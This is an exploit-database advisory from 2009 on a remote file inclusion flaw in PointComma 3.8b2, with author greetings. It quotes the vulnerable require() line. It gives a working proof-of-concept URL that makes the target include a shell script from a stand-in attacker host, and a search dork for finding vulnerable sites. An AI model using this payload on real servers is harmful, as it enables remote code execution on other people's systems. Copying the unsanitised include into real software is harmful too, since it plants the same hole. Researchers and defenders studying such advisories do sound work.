[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : PointComma <= 3.8b2 Remote File Inclusion Vulnerability
# Published : 2009-11-24
# Author : cr4wl3r
# Previous Title : phptraverse <= 0.8.0 Remote File Inclusion Vulnerability
# Next Title : W3infotech ( Auth Bypass ) SQL Injection Vulnerability
[ Discovered by cr4wl3r cr4wl3r[4t]linuxmail[dot]org ]
########################################################################
#PointComma <= 3.8b2 Remote File Include Vulnerability
#Download Script : http://nchc.dl.sourceforge.net/project/pointcomma/pointcomma/
#Dork : die("Hacking attempt"); :D
########################################################################
#
#Vuln : ./PointComma-3.8b2/includes/classes/pctemplate.php (line 14)
# <?php
# require($pcConfig['smartyPath'].'Smarty.class.php');
# ?>
#PoC : http://server/[path]/includes/classes/pctemplate.php?pcConfig[smartyPath]=http://attacker.com/shell.txt?cmd
#
#
#
########################################################################
#Thx 2 : str0ke, opt!x hacker, xoron, irvian, cyberlog, basix,
# dan seluruh orang yang membenciku dan menyayangiku [I Love U Full] :*
########################################################################
/##############################################
# all member at sekuritionline.net #
# all member at manadocoding.net #
##############################################/
[ Gorontalo / 2009 ]